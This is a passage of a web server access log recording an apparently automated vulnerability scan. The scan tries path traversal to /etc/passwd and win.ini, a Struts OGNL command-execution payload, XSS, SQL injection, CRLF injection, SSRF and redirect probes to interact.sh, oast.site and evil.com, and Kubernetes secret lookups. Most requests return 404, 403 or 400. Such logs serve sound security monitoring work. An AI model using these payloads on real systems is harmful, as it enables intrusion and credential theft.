+0800] "GET /....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /en/php/usb_sync.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.8.15" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /admin/index.php?id=pages HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.7" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /users/registration HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 47 "-" "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.3) Gecko/20070423 Firefox/2.0.0.3" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /jkstatus HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Edg/106.0.1370.42" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /jkstatus; HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:54 +0800] "GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 403 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /html/log HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET //interact.sh HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:91.0) Gecko/20100101 Firefox/91.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 5.1; rv:35.0) Gecko/20100101 Firefox/35.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.50" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /echo-server.html?code=test&state=http://www.interact.sh HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "POST /account HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "POST /account HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "POST /api/external/7.0/system.System.get_infos HTTP/1.1" 404 146 "http://96.9.228.88:888" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:58.0) Gecko/20100101 Firefox/58.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "PUT /meta HTTP/1.1" 405 150 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET //www.interact.sh HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.50" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /login?next=http://interact.sh/?app.scan/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/570.19 (KHTML, like Gecko) Version/12.6.26 Safari/570.19" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /signup?next=http://interact.sh/?app.scan/ HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /IntellectMain.jsp?IntellectSystem=https://www.interact.sh HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.29" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "POST /filemanager/upload.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/9.1.2 Safari/602.3.12" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /index.php/System/MailConnect/host/ct4hu7d65jrdcfcsg34068tjhmuciozcp.oast.site/port/80/secure/ HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/122.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID&WEBACCOUNTPASSWORD HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login&CipheredValue HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362" 172.18.0.4 - - [29/Nov/2024:09:55:55 +0800] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\x22> HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/123.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.68" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /html/device-id HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.63" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /session/login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.6.26" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /services/user/values.xml?var=STATUS HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /select_project.php?url=http://interact.sh HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:56.0) Gecko/20100101 Firefox/56.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "POST /fcgi-bin/wgsetcgi HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "POST /upload HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.41" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /html/repository HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.19" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /clock_status.php?current_page=http://interact.sh HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2pVJVm7ifBt16JuB3KFs7lb1QFi.jsp HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "POST /web/google_analytics.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\x22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 404 548 "http://96.9.228.88:888" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.46" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /html/common/forward_js.jsp?FORWARD_URL=http://evil.com HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.53" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.8.17" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "POST /wp-admin/admin.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /plus/feedback.php/rp4hu%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E?aid=3 HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/2pVJVxmhBxAio54fvgFLXyGBxcz/)%3B%3C%2Fscript%3E%3C HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.6" 172.18.0.4 - - [29/Nov/2024:09:55:56 +0800] "GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.6) Gecko/20050325 Firefox/1.0.2 (Debian package 1.0.2-1)" 172.18.0.4 - - [29/Nov/2024:09:55:57 +0800] "GET /../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 150 "-" "-" 172.18.0.4 - - [29/Nov/2024:09:55:57 +0800] "GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 172.18.0.4 - - [29/Nov/2024:09:55:57 +0800] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 13904.97.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.167 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:57 +0800] "GET / HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.14" 172.18.0.4 - - [29/Nov/2024:09:55:57 +0800] "GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:55:57 +0800] "GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?windowTitle=AdministratorHelpWindow> HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:43 +0800] "GET /admin/login/index.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:44 +0800] "GET /wp-json/download-monitor/v1/user_data HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 